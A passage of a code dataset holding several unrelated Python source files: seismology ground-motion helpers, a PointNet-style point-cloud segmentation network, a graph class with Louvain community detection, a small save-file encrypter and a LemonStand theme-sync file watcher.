Valid values:\n \"california\", \"japan\".\n\n depth_1_0 (Optional[float]): depth to the 1.0 km∕s shear-wave\n velocity horizon beneath the site, :math:`Z_{1.0}` in (km).\n\n Returns:\n float: estimated depth to a shear-wave velocity of 2.5 km/sec\n (km).\n \"\"\"\n if v_s30:\n param = v_s30\n if region == 'japan':\n # From equation 6.10 on page 63\n intercept = 5.359\n slope = 1.102\n else:\n # From equation 6.9 on page 63\n intercept = 7.089\n slope = 1.144\n\n # Global model\n # Not supported by NGA-West2 spreadsheet, and therefore removed.\n # foo = 6.510\n # bar = 1.181\n elif depth_1_0:\n param = depth_1_0\n if region == 'japan':\n # From equation 6.13 on page 64\n intercept = 0.408\n slope = 1.745\n else:\n # From equation 6.12 on page 64\n intercept = 1.392\n slope = 1.798\n\n # Global model\n # Not supported by NGA-West2 spreadsheet, and therefore removed.\n # foo = 0.748\n # bar = 2.128\n else:\n raise NotImplementedError\n\n return np.exp(intercept - slope * np.log(param))\n\n @staticmethod\n def calc_depth_hyp(mag, dip, depth_tor, depth_bor):\n \"\"\"Estimate the depth to hypocenter.\n\n Args:\n mag (float): moment magnitude of the event (:math:`M_w`)\n\n dip (float): fault dip angle (:math:`\\phi`, deg).\n\n depth_tor (float): depth to the top of the rupture\n plane (:math:`Z_{tor}`, km).\n\n depth_bor (float): depth to the bottom of the rupture\n plane (:math:`Z_{bor}`, km).\n\n Returns:\n float: estimated hypocenter depth (km)\n \"\"\"\n # Equations 35, 36, and 37 of journal article\n ln_dZ = min(\n min(-4.317 + 0.984 * mag, 2.325) +\n min(0.0445 * (dip - 40), 0),\n np.log(0.9 * (depth_bor - depth_tor))\n )\n\n depth_hyp = depth_tor + np.exp(ln_dZ)\n\n return depth_hyp\n\n @staticmethod\n def calc_width(mag, dip, depth_tor, depth_bot=15.0):\n \"\"\"Estimate the fault width using Equation (39) of CB14.\n\n Args:\n mag (float): moment magnitude of the event (:math:`M_w`)\n\n dip (float): fault dip angle (:math:`\\phi`, deg).\n\n depth_tor (float): depth to the top of the rupture\n plane (:math:`Z_{tor}`, km).\n\n Keyword Args:\n depth_bot (Optional[float]): depth to bottom of seismogenic crust\n (km). Used to calculate fault width if none is specified. 
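# The static helpers in this class chain together when optional scenario
# inputs are omitted: Z2.5 from Vs30 (or Z1.0) and region, rupture width from
# magnitude/dip/Z_tor, bottom-of-rupture depth from top, dip, and width, and
# finally the hypocentral depth. A hedged usage sketch (numeric values are
# made up for illustration):
#
#   z2_5 = CampbellBozorgnia2014.calc_depth_2_5(450., region='california')
#   width = CampbellBozorgnia2014.calc_width(mag=6.5, dip=90., depth_tor=2.)
#   z_bor = CampbellBozorgnia2014.calc_depth_bor(2., 90., width)
#   z_hyp = CampbellBozorgnia2014.calc_depth_hyp(6.5, 90., 2., z_bor)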
If\n *None*, then a value of 15 km is used.\n\n Returns:\n float: estimated fault width (km)\n \"\"\"\n return min(\n np.sqrt(10 ** ((mag - 4.07) / 0.98)),\n (depth_bot - depth_tor) / np.sin(np.radians(dip))\n )\n\n @staticmethod\n def calc_depth_bor(depth_tor, dip, width):\n \"\"\"Compute the depth to bottom of the rupture (km).\n\n Args:\n dip (float): fault dip angle (:math:`\\phi`, deg).\n\n depth_tor (float): depth to the top of the rupture\n plane (:math:`Z_{tor}`, km).\n\n width (float): Down-dip width of the fault.\n\n Returns:\n float: depth to bottom of the fault rupture (km)\n \"\"\"\n return depth_tor + width * np.sin(np.radians(dip))\n","sub_path":"pygmm/campbell_bozorgnia_2014.py","file_name":"campbell_bozorgnia_2014.py","file_ext":"py","file_size_in_byte":15770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"265187747","text":"import torch\nimport faiss\nimport numpy as np\n\n\nclass Conv1d(torch.nn.Module):\n def __init__(self, in_channle, out_channel, kernel_size=1):\n super(Conv1d, self).__init__()\n self.conv = torch.nn.Conv1d(in_channle, out_channel, kernel_size)\n self.bn = torch.nn.BatchNorm1d(out_channel)\n self.relu = torch.nn.ReLU()\n\n def forward(self, x):\n x = self.relu(self.bn(self.conv(x)))\n return x\n\n\nclass Linear(torch.nn.Module):\n def __init__(self, in_channle, out_channel):\n super(Linear, self).__init__()\n self.fc = torch.nn.Linear(in_channle, out_channel)\n self.bn = torch.nn.BatchNorm1d(out_channel)\n self.relu = torch.nn.ReLU()\n\n def forward(self, x):\n x = self.relu(self.bn(self.fc(x)))\n return x\n\n\nclass Pointnet(torch.nn.Module):\n def __init__(self, npoints, nfeature, mlp):\n super(Pointnet, self).__init__()\n self.fc = torch.nn.Sequential(\n Conv1d(nfeature, mlp[0]),\n Conv1d(mlp[0], mlp[1]),\n Conv1d(mlp[1], mlp[2]),\n torch.nn.MaxPool1d(npoints)\n )\n\n def forward(self, x):\n x = x.transpose(1, 2)\n x = self.fc(x)\n return x\n\ndef sample(xyz, group_num):\n '''\n random sample points\n input:\n xyz: batch_size * npoints * 3\n cpoint: center num\n return: \n center_xyz: batch_size * group_num * 3\n '''\n batch_size = xyz.size(0)\n npoints = xyz.size(1)\n center_xyz = torch.randn(batch_size, group_num, 3).cuda(xyz.get_device())\n for batch in range(batch_size):\n index = np.arange(npoints)\n np.random.shuffle(index)\n index = torch.from_numpy(index[:group_num])\n center = xyz[batch][index][:]\n center_xyz[batch] = center\n return center_xyz\n\ndef group(center_xyz, xyz, feature, group_size, index):\n '''\n use knn divide group\n input:\n center_xyz: batch_size * group_num * 3\n xyz: batch_size * npoints * 3\n feature: batch_size * npoints * nfeature\n group_size: int\n return:\n group_xyz: batch_size * group_num * group_size * 3\n group_feature: batch_size * group_num * group_size * nfeature\n '''\n batch_size = center_xyz.size()[0]\n group_num = center_xyz.size()[1]\n nfeature = feature.size()[2]\n group_xyz = torch.rand(batch_size, group_num, group_size, 3)\n group_feature = torch.rand(batch_size, group_num, group_size, nfeature).cuda(xyz.get_device())\n for batch in range(batch_size):\n center = center_xyz[batch]\n index.reset()\n index.add(xyz[batch].cpu().numpy())\n D, I = index.search(center.cpu().numpy(), group_size)\n for i in range(group_num):\n group_xyz[batch][i] = xyz[batch][I[i]]\n group_feature[batch][i] = feature[batch][I[i]]\n return group_xyz, group_feature\n\n\ndef out(x):\n print(x.type(), x.size())\n\ndef cluster(xyz, feature, group_size, group_num, index, 
train_num=1):\n batch_size = xyz.size(0)\n npoints = xyz.size(1)\n nfeature = feature.size(2)\n device = xyz.get_device()\n center_xyz = torch.rand(batch_size, group_num, 3).cuda(device)\n group_xyz = torch.rand(batch_size, group_num, group_size, 3).cuda(device)\n group_feature = torch.rand(batch_size, group_num, group_size, nfeature).cuda(device)\n \n for batch in range(batch_size):\n # select center points randomly\n ps = xyz[batch].cpu().numpy()\n ft = feature[batch].cpu().detach().numpy()\n indices = np.arange(npoints)\n np.random.shuffle(indices)\n indices = indices[:group_num]\n center_ps = np.take(ps, indices, axis=0)\n for _ in range(train_num):\n # initialize index\n index.reset()\n index.add(center_ps)\n # get the nearest central points for every point\n D, I = index.search(ps, 1)\n # record the class of each point\n label = I.ravel()\n for i in range(group_num):\n if np.where(label == i)[0].shape[0] == 0:\n continue\n group_ps = np.take(ps, np.where(label == i), axis=0)[0]\n center_ps[i] = np.mean(group_ps, axis=0)\n center_xyz[batch] = torch.from_numpy(center_ps)\n x_id = []\n for i in range(group_num):\n group_ps = np.take(ps, np.where(label == i), axis=0)[0]\n group_ft = np.take(ft, np.where(label == i), axis=0)[0]\n number = group_ps.shape[0]\n if number <= 0:\n x_id.append(i)\n break\n for j in range(number, group_size):\n group_ps = np.row_stack((group_ps, group_ps[j - number]))\n group_ft = np.row_stack((group_ft, group_ft[j - number]))\n group_xyz[batch][i] = torch.from_numpy(group_ps[:group_size])\n group_feature[batch][i] = torch.from_numpy(group_ft[:group_size])\n if len(x_id) > 0:\n index.reset()\n index.add(ps)\n x = np.take(center_ps, x_id, axis=0)\n D, I = index.search(np.take(center_ps, x_id, axis=0), group_size)\n for i, center_id in enumerate(x_id):\n group_xyz[batch][center_id] = torch.from_numpy(np.take(ps, I[i], axis=0))\n group_feature[batch][center_id] = torch.from_numpy(np.take(ft, I[i], axis=0))\n return center_xyz, group_xyz, group_feature\n\nclass SA(torch.nn.Module):\n '''\n params: \n npoints, nfeature, group_num, mlp, index\n\n input: \n xyz: batch_size * npoints * 3\n feature: batch_size * npoints * nfeature\n \n output:\n center_xyz: batch_size * group_num * 3\n center_feature: batch_size * group_num * new_feature(mlp[2])\n '''\n def __init__(self, npoints, nfeature, group_num, mlp, index):\n super(SA, self).__init__()\n self.npoints = npoints\n self.index = index\n self.group_num = group_num\n self.group_size = npoints // group_num\n self.nfeature = nfeature\n self.pointnet = Pointnet(self.group_size, nfeature, mlp)\n\n def forward(self, xyz, feature):\n batch_size = xyz.size(0)\n # center_xyz = sample(xyz, self.group_num)\n # group_xyz, group_feature = group(center_xyz, xyz, feature, self.group_size, self.index)\n\n center_xyz, group_xyz, group_feature = cluster(xyz, feature, self.group_size, self.group_num, self.index)\n\n group_feature = group_feature.view(-1, self.group_size, self.nfeature)\n center_feature = self.pointnet(group_feature)\n center_feature = center_feature.view(batch_size, -1, center_feature.size()[1])\n return center_xyz, center_feature\n\n\nclass SegNet(torch.nn.Module):\n def __init__(self, npoints, nclass):\n super(SegNet, self).__init__()\n self.res = faiss.StandardGpuResources()\n self.index = faiss.index_cpu_to_gpu(self.res, 0, faiss.IndexFlatL2(3))\n self.sa1 = SA(npoints, 3, 512, [64, 64, 128], self.index)\n self.sa2 = SA(512, 128, 128, [128, 128, 256], self.index)\n self.sa3 = SA(128, 256, 1, [256, 512, 1024], 
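# cluster() above runs Lloyd-style k-means with a faiss flat index doing the
# nearest-centroid assignment, then pads/backfills groups to a fixed size. A
# minimal sketch of one assignment/update step (names and shapes are
# illustrative; faiss expects contiguous float32 arrays):
import numpy as np
import faiss

def lloyd_step(points, centroids):
    # points: (N, 3) float32, centroids: (K, 3) float32
    index = faiss.IndexFlatL2(3)
    index.add(centroids)
    _, labels = index.search(points, 1)  # nearest centroid per point
    labels = labels.ravel()
    for k in range(centroids.shape[0]):
        members = points[labels == k]
        if len(members):  # skip empty clusters, as cluster() does
            centroids[k] = members.mean(axis=0)
    return labels, centroids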
self.index)\n self.fc3 = torch.nn.Sequential(\n Conv1d(1280, 256),\n Conv1d(256, 256),\n )\n self.fc2 = torch.nn.Sequential(\n Conv1d(384, 256),\n Conv1d(256, 128),\n )\n self.fc1 = torch.nn.Sequential(\n Conv1d(131, 128),\n Conv1d(128, nclass),\n )\n\n def forward(self, x):\n xyz_1, feature_1 = x, x\n xyz_2, feature_2 = self.sa1(xyz_1, feature_1) \n xyz_3, feature_3 = self.sa2(xyz_2, feature_2)\n xyz_4, feature_4 = self.sa3(xyz_3, feature_3)\n print(\"global\")\n fp_feature_3 = torch.cat([feature_3, feature_4.repeat(1, feature_3.size(1), 1)], 2)\n fp_feature_3 = self.fc3(fp_feature_3.transpose(1, 2)).transpose(1, 2)\n fp_feature_2 = self.interpolate(xyz_2, feature_2, xyz_3, fp_feature_3)\n fp_feature_2 = self.fc2(fp_feature_2.transpose(1, 2)).transpose(1, 2)\n fp_feature_1 = self.interpolate(xyz_1, feature_1, xyz_2, fp_feature_2)\n fp_feature_1 = self.fc1(fp_feature_1.transpose(1, 2)).transpose(1, 2)\n print(\"interpolate\")\n return fp_feature_1.contiguous()\n\n def interpolate(self, xyz_down, feature_down, xyz_up, feature_up):\n '''\n xyz_down: batch_size * group_size_down * 3\n feature_down : batch_size * group_size_down * 3\n xyz_up: batch_size * group_size_up * 3\n feature_up : batch_size * group_size_up * 3\n '''\n batch_size = xyz_down.size(0)\n group_size_down = feature_down.size(1)\n feature_size_up = feature_up.size(2)\n feature_size_down = feature_down.size(2)\n device = xyz_down.get_device()\n new_feature = torch.zeros(batch_size, group_size_down, feature_size_up).cuda(device)\n for i in range(batch_size):\n self.index.reset()\n self.index.add(xyz_up[i].cpu().numpy())\n D, I = self.index.search(xyz_down[i].cpu().numpy(), 3)\n for j in range(group_size_down):\n sigma_dis = 0\n for k in range(3):\n if abs(D[j][k]) < 1e-6:\n dis = 1e10\n else:\n dis = 1 / D[j][k]\n new_feature[i][j] += feature_up[i][I[j][k]] * dis\n sigma_dis += dis\n new_feature[i][j] /= sigma_dis\n new_feature = torch.cat((new_feature, feature_down), 2)\n return new_feature\n \n\nif __name__ == \"__main__\":\n net = SegNet(2048, 5)\n net.cuda()\n x = torch.randn(20, 2048, 3).cuda()\n y = net(x)\n out(y)\n","sub_path":"model/cstnet.py","file_name":"cstnet.py","file_ext":"py","file_size_in_byte":9701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"147521211","text":"import struct\n\n\n\nimport networkx as nx\n\n\n\nimport community as community_louvain\n\n\n\nclass Graph(object):\n def __init__(self, prefix, directed, colored):\n \"\"\"\n Graph class defines the basic graph structure for addax used for clustering communities, motif discovery,\n and generating random examples\n\n @param prefix: a string to reference this graph by\n @param directed: indicates if the graph is directed or undirected\n @param colored: indicates if the nodes in the graph have color\n \"\"\"\n self.prefix = prefix\n self.directed = directed\n self.colored = colored\n\n # vertices is a mapping from the vertex index to the vertex object\n self.vertices = {}\n # edges is a list of edges with sources, destinations, and weights\n self.edges = []\n # the edge set contains a list of (source, destination) indices\n self.edge_set = set()\n\n def AddVertex(self, index, enumeration_index, community = -1, color = -1):\n \"\"\"\n Add a vertex to the graph\n\n @param index: the index for the vertex\n @param enumeration_index: an internal ordering system for enumeration speed up\n @param community: the community that the vertex belongs to (default = -1)\n @param color: the color that the vertex 
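# SegNet.interpolate() in the cstnet record above is 3-nearest-neighbour
# inverse-distance feature propagation (the PointNet++ upsampling rule):
# coarse features are spread to finer points with weights 1/d, normalised to
# sum to one. A vectorised restatement of the per-batch inner loops
# (illustrative; torch tensors assumed):
import torch

def idw_interpolate(dist, idx, feats_up):
    # dist: (M, 3) distances to the 3 nearest coarse points
    # idx:  (M, 3) long indices into feats_up, feats_up: (K, C)
    w = 1.0 / dist.clamp(min=1e-6)      # guard near-zero distances
    w = w / w.sum(dim=1, keepdim=True)  # normalise per fine point
    return (feats_up[idx] * w.unsqueeze(-1)).sum(dim=1)  # (M, C)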
has (default = -1)\n \"\"\"\n # vertices must have unique indices\n assert (not index in self.vertices)\n\n # create the vertex and add it to the mapping\n vertex = self.Vertex(self, index, enumeration_index, community, color)\n self.vertices[index] = vertex\n\n def AddEdge(self, source_index, destination_index, weight = 1):\n \"\"\"\n Add an edge to the graph\n\n @param source_index: the integer of the source index in the graph\n @param destination_index: the integer of the destination index in the graph\n @param weight: the weight of this edge where higher values indicate greater strength (default = 1)\n \"\"\"\n # the source and destination indices must actually belong to vertices\n assert (source_index in self.vertices)\n assert (destination_index in self.vertices)\n\n # do not allow self loops\n assert (not source_index == destination_index)\n\n # if the graph is undirected, make the source destination the smaller of the two indices\n if not self.directed and destination_index < source_index:\n tmp = destination_index\n destination_index = source_index\n source_index = tmp\n\n # create the edge and add it to the list of edges\n edge = self.Edge(self, source_index, destination_index, weight)\n self.edges.append(edge)\n\n # add to the set of edges in the graph for easier look up\n if self.directed:\n self.edge_set.add((source_index, destination_index))\n else:\n # directed edges go in both directions\n self.edge_set.add((source_index, destination_index))\n self.edge_set.add((destination_index, source_index))\n\n # add the edge to both vertices\n self.vertices[source_index].AddEdge(edge)\n self.vertices[destination_index].AddEdge(edge)\n\n def NVertices(self):\n \"\"\"\n Return the number of vertices in this graph\n \"\"\"\n return len(self.vertices.keys())\n\n def NEdges(self):\n \"\"\"\n Return the number of edges in this graph\n \"\"\"\n return len(self.edges)\n\n def DetectCommunities(self, output_filename = None):\n \"\"\"\n Returns a list of communities based on the Louvain algorithm\n \"\"\"\n # initialize a networkx graph\n G = nx.Graph()\n\n # add all vertices\n for vertex in self.vertices.values():\n G.add_node(vertex.index)\n\n # add all edges to the networkx graph\n undirected_edges = {}\n for edge in self.edges:\n # get the min and max edge\n edge_one = min(edge.source_index, edge.destination_index)\n edge_two = max(edge.destination_index, edge.source_index)\n\n if not (edge_one, edge_two) in undirected_edges:\n undirected_edges[(edge_one, edge_two)] = edge.weight\n else:\n undirected_edges[(edge_one, edge_two)] += edge.weight\n\n # add the undirected edge to the graph\n for (edge_one, edge_two) in undirected_edges:\n G.add_edge(edge_one, edge_two, weight=undirected_edges[(edge_one, edge_two)])\n\n # determine communities in the graph\n partition = community_louvain.best_partition(G)\n\n # write the partition to file\n if not output_filename == None:\n with open(output_filename, 'wb') as fd:\n fd.write(struct.pack('q', self.NVertices()))\n for (neuron_id, community) in partition.items():\n fd.write(struct.pack('qq', neuron_id, community))\n\n # get a list of communities using the Louvain algorithm\n return partition\n\n def Communities(self):\n \"\"\"\n Return a mapping from vertex indices to communities\n \"\"\"\n communities = {}\n\n for vertex in self.vertices.values():\n communities[vertex.index] = vertex.community\n\n return communities\n\n class Vertex(object):\n def __init__(self, graph, index, enumeration_index, community = -1, color = -1):\n \"\"\"\n Vertex class 
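# DetectCommunities() above delegates to python-louvain: collapse parallel
# directed edges into one undirected weighted edge, then take the
# modularity-maximising partition. A minimal end-to-end usage sketch with toy
# edges (illustrative only):
import networkx as nx
import community as community_louvain

G = nx.Graph()
G.add_edge(0, 1, weight=2.0)
G.add_edge(1, 2, weight=1.0)
G.add_edge(3, 4, weight=3.0)
partition = community_louvain.best_partition(G)  # {node_index: community_id}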
defines the vertices in a graph that are labeled by the index\n\n @param graph: the larger graph that contains this vertex\n @param index: the integer index that corresponds to this vertex\n @param enumeration_index: an internal ordering system for enumeration speed up\n @param community: the community that the vertex belongs to (default = -1)\n @param color: the color that the vertex has (default = -1)\n \"\"\"\n self.graph = graph\n self.index = index\n self.enumeration_index = enumeration_index\n self.community = community\n self.color = color\n\n # extra instance variables keep track of the ingoing and outgoing edges from the vertex\n self.incoming_edges = []\n self.outgoing_edges = []\n # keep track of incoming and outgoing neighbors\n self.incoming_neighbors = set()\n self.outgoing_neighbors = set()\n self.neighbors = set()\n\n def AddEdge(self, edge):\n \"\"\"\n Add this edge to the set of edges for this vertex and ensure no edge parallelism\n\n @param edge: the edge that connects this vertex to another\n \"\"\"\n # ensure that this is a valid edge for this vertex\n assert (edge.source_index == self.index or edge.destination_index == self.index)\n\n # if the graph is directed, add the incoming or outgoing edge\n if self.graph.directed:\n if edge.source_index == self.index:\n self.outgoing_edges.append(edge)\n assert (not edge.destination_index in self.outgoing_neighbors)\n self.outgoing_neighbors.add(edge.destination_index)\n self.neighbors.add(edge.destination_index)\n else:\n self.incoming_edges.append(edge)\n assert (not edge.source_index in self.incoming_neighbors)\n self.incoming_neighbors.add(edge.source_index)\n self.neighbors.add(edge.source_index)\n # if the graph is not directed, add the edge to both incoming and outgoing\n else:\n self.incoming_edges.append(edge)\n self.outgoing_edges.append(edge)\n\n if edge.source_index == self.index:\n assert (not edge.destination_index in self.incoming_neighbors and not edge.destination_index in self.outgoing_neighbors)\n self.incoming_neighbors.add(edge.destination_index)\n self.outgoing_neighbors.add(edge.destination_index)\n self.neighbors.add(edge.destination_index)\n else:\n assert (not edge.source_index in self.incoming_neighbors and not edge.source_index in self.outgoing_neighbors)\n self.incoming_neighbors.add(edge.source_index)\n self.outgoing_neighbors.add(edge.source_index)\n self.neighbors.add(edge.source_index)\n\n def IncomingNeighborIndices(self):\n \"\"\"\n Returns the neighbors with edges going from\n \"\"\"\n return self.incoming_neighbors\n\n def OutgoingNeighborIndices(self):\n \"\"\"\n Returns the neighbors with an edge from this vertex to that neighbor\n \"\"\"\n return self.outgoing_neighbors\n\n def NeighborIndices(self):\n \"\"\"\n Return all neighbors from this vertex regardless of incoming and outgoing status\n \"\"\"\n return self.neighbors\n\n\n class Edge(object):\n def __init__(self, graph, source_index, destiantion_index, weight = 1):\n \"\"\"\n Edge class defines the edges in a graph that connect the vertices\n\n @param graph: the larger graph that contains this edge\n @param source_index: the integer of the source index in the graph\n @param destination_index: the integer of the destination index in the graph\n @param weight: the weight of this edge where higher values indicate greater strength (default = 1)\n \"\"\"\n self.graph = graph\n self.source_index = source_index\n self.destination_index = destiantion_index\n self.weight = 
weight\n","sub_path":"data_structures/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":9812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"597136092","text":"#! /usr/bin/env python3\n\ndef main():\n a = [((1,2),(3,5))]\n iterateur = iter(a)\n# depart = next(iterateur)\n# prec = depart\n# n = [ p for p,s in iterateur if p!=s]\n for p,s in iterateur:\n if p!=s:\n print(p!=s)\n\n\n\n\n\n\nmain()\n","sub_path":"semestre5/python/test/exam_mi_semestre2016/exam2016.py","file_name":"exam2016.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"4317696","text":"\"\"\"\nencrypt.py- encrypter for stickmanranger save files.\nI want people to be able to mad this game, but i dont \nnecessarily want people to be able to change it up \nsuper easily!\"\"\"\nfrom cryptography.fernet import Fernet\nfrom itertools import count\nimport os\nimport shutil\nimport time\n\nif not os.name == 'nt':\n os.getlogin = lambda: __import__('pwd').getpwuid(os.getuid())[0]\n\nCURRENT_TIME = time.asctime()\nPATH = {\n 'nt': 'C:\\\\Users\\\\{}\\\\.stickman_new_world\\\\save\\\\'.format(os.getlogin()),\n 'posix': '/home/{}/.stickman_new_world/save/'.format(os.getlogin()),\n}[os.name]\n\nPATH_NUMERIC = os.path.join(PATH, '%s') + '\\\\' if os.name == 'nt' else '/'\nprint(PATH_NUMERIC)\n\nif not os.path.exists(PATH):\n os.makedirs(PATH)\n\nFILE = PATH + '.smr-save'\nprint(FILE)\n\n\ndef encrypt(string):\n if not os.path.exists(PATH):\n os.makedirs(PATH)\n\n prev_key = os.listdir(PATH)\n for f in prev_key:\n if not f in ('.smr-save', 'time'):\n os.remove(PATH + f)\n\n prev_dir = 0\n for number in count():\n if os.path.exists(PATH_NUMERIC % number):\n prev_dir = number\n\n else:\n # the system can't find this file, but it will only\n # be the first one it doesnt find.\n prev_dir = number\n break\n\n def_path = PATH\n # os.mkdir(def_path)\n\n key = Fernet.generate_key()\n # simply make a file with that name\n with open(def_path + key.decode(), 'w'):\n pass\n\n encrypter = Fernet(key)\n cipher = encrypter.encrypt(string.encode())\n\n with open(FILE, 'wb') as cipher_file:\n cipher_file.write(cipher)\n\n with open((os.path.join(def_path, 'time')), 'w') as time_file:\n time_file.write(CURRENT_TIME)\n return cipher\n\n\ndef decrypt(spec=None):\n prev_dir = spec\n\n if spec is None:\n prev_dir = 0\n for number in count():\n if os.path.exists(PATH_NUMERIC % number):\n prev_dir = number\n\n else:\n # the system can't find this file, but it will only\n # be the first one it doesnt find.\n break\n\n data = open(FILE, 'rb').read()\n key = os.listdir(PATH)\n key.pop(key.index('.smr-save'))\n key.pop(key.index('time'))\n key = key[0].encode()\n\n encrypter = Fernet(key)\n text = encrypter.decrypt(data).decode()\n\n saved_time = open(os.path.join(PATH, 'time')).read()\n\n return text, saved_time\n\n\nif __name__ == '__main__':\n time = __import__('time').asctime()\n print(encrypt(open('misc\\\\shello.ini').read()))\n print(decrypt()[0], decrypt()[1], sep='\\n\\n\\n')\n","sub_path":"game/encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"631959743","text":"# Copyright (c) 2014 LemonStand eCommerce Inc. 
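# The encrypt.py record above stores a freshly generated Fernet key as an
# empty file whose *name* is the key, and writes the ciphertext to .smr-save.
# Its cryptographic core is a plain symmetric round-trip:
from cryptography.fernet import Fernet

key = Fernet.generate_key()      # url-safe base64-encoded 32-byte key
f = Fernet(key)
token = f.encrypt(b"save data")  # authenticated, timestamped ciphertext
assert f.decrypt(token) == b"save data"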
https://lemonstand.com/\n# All rights reserved.\n#\n# This is free and unencumbered software released into the public domain.\n\n# Anyone is free to copy, modify, publish, use, compile, sell, or\n# distribute this software, either in source code form or as a compiled\n# binary, for any purpose, commercial or non-commercial, and by any\n# means.\n#\n# In jurisdictions that recognize copyright laws, the author or authors\n# of this software dedicate any and all copyright interest in the\n# software to the public domain. We make this dedication for the benefit\n# of the public at large and to the detriment of our heirs and\n# successors. We intend this dedication to be an overt act of\n# relinquishment in perpetuity of all present and future rights to this\n# software under copyright law.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR\n# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,\n# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR\n# OTHER DEALINGS IN THE SOFTWARE.\n#\n# For more information, please refer to \n\nimport sys \nimport time\nimport os \nimport json\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nimport time\nfrom Connector import Connector\nfrom watchdog.events import PatternMatchingEventHandler\nfrom colorama import Fore, Back, Style\n\nclass Listener (PatternMatchingEventHandler):\n\t# The number of times to retry a connection to LemonStand API\n\tRETRIES = 2\n\n\tdef __init__ (self, connection, config, utils):\n\t\tPatternMatchingEventHandler.patterns = config.file_patterns\n\t\tPatternMatchingEventHandler.ignore_patterns = config.ignore_patterns\n\t\tPatternMatchingEventHandler.ignore_directories = True\n\t\tPatternMatchingEventHandler.case_sensitive = True\n\n\t\tself.connection = connection\n\t\tself.config = config\n\t\tself.utils = utils\n\t\tself.reset = self.RETRIES\n\n\tdef __check_connection (self):\n\t\t# Get a new connection object to lemonstand API\n\t\tc = Connector()\n\t\tidentity = c.get_identity(self.config.api_host, self.config.api_access)\n\t\tconnection = c.s3_connection(identity);\n\t\tself.connection = connection\n\n\t\treturn\n\n\tdef __reset_retries (self):\n\t\tself.reset = self.RETRIES\n\n\tdef __register (self, event_path):\n\t\tpath = event_path.replace(self.config.watch_dir, '')\n\t\tdata = { 'keys': [path.replace('\\\\', '/')] }\n\n\t\ttry:\n\t\t\t# Update the resource with LemonStand\n\t\t\tres = requests.put(\n\t\t\t\tself.config.api_host + '/api/v2/resource/touch', \n\t\t\t\theaders = { \n\t\t\t\t\t'Content-Type': 'application/json',\n\t\t\t\t\t'Authorization': 'Bearer ' + self.config.api_access\n\t\t\t\t},\n\t\t\t\tdata=json.dumps(data), \n\t\t\t\tallow_redirects=False,\n\t\t\t\tverify=False\n\t\t\t)\n\n\t\t\tif res.status_code != 200:\n\t\t\t\traise Exception()\n\t\texcept:\n\t\t\tprint(Fore.RED + '[' + time.strftime(\"%c\") + '] Failed to register file with LemonStand!' 
+ Style.RESET_ALL)\n\n\tdef remove (self, event_path):\n\t\tpath = event_path.replace(self.config.watch_dir, '')\n\t\tkey = \"/\".join([self.connection[\"store\"], \"themes\", self.connection[\"theme\"], path.replace('\\\\', '/')])\n\n\t\ttry:\n\t\t\tself.connection[\"bucket\"].delete_key(key)\n\t\t\tprint(Fore.GREEN + '[' + time.strftime(\"%c\") + '] Successfully removed ' + path + Style.RESET_ALL)\n\t\texcept:\n\t\t\tif (self.reset > 0):\n\t\t\t\tself.reset-=1\n\t\t\t\tself.__check_connection()\n\t\t\t\tself.remove(event_path)\n\t\t\telse:\n\t\t\t\tprint(Fore.RED + '[' + time.strftime(\"%c\") + '] Failed to remove ' + path + Style.RESET_ALL)\n\n\t\tself.__reset_retries()\n\t\t# Register the file with LS\n\t\tself.__register(event_path)\n\n\tdef upsert (self, event_path):\n\t\tpath = event_path.replace(self.config.watch_dir, '')\n\t\tkey = \"/\".join([self.connection[\"store\"], \"themes\", self.connection[\"theme\"], path.replace('\\\\', '/')])\n\t\texpires = int(time.time())\n\t\theaders = {\n\t\t\t'Cache-Control': \"max-age=\" + str(expires) + \", public\",\n\t\t\t'Expires': expires\n\t\t}\n\n\t\ttry:\n\t\t\tk = self.connection[\"bucket\"].new_key(key)\n\t\t\tk.set_contents_from_filename(event_path, headers=headers)\n\t\t\tprint(Fore.GREEN + '[' + time.strftime(\"%c\") + '] Successfully uploaded ' + path + Style.RESET_ALL)\n\t\texcept:\n\t\t\tif (self.reset > 0):\n\t\t\t\tself.reset-=1\n\t\t\t\tself.__check_connection()\n\t\t\t\tself.upsert(event_path)\n\t\t\telse:\n\t\t\t\tprint(Fore.RED + '[' + time.strftime(\"%c\") + '] Failed to upload ' + path + Style.RESET_ALL)\n\n\t\tself.__reset_retries()\n\t\t# Register the file with LS\n\t\tself.__register(event_path)\n\n\tdef on_modified (self, event):\n\t\tself.upsert(event.src_path)\n\n\tdef on_created (self, event):\n\t\tself.upsert(event.src_path)\n\n\tdef on_moved (self, event):\n\t\tself.upsert(event.dest_path)\n\n\tdef on_deleted (self, event):\n\t\tself.remove(event.src_path)","sub_path":"lemonsync/Listener.py","file_name":"Listener.py","file_ext":"py","file_size_in_byte":4906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"226091348","text":"##############################################################################\n#\n# Copyright (c) 2003 Zope Corporation. All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Visible Source\n# License, Version 1.0 (ZVSL). 
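# The Listener in the LemonSync record above only reacts to filesystem events
# once it is scheduled on a watchdog Observer; that wiring lives elsewhere in
# the project. A hedged sketch of the standard pattern (handler construction
# and paths here are illustrative):
from watchdog.observers import Observer
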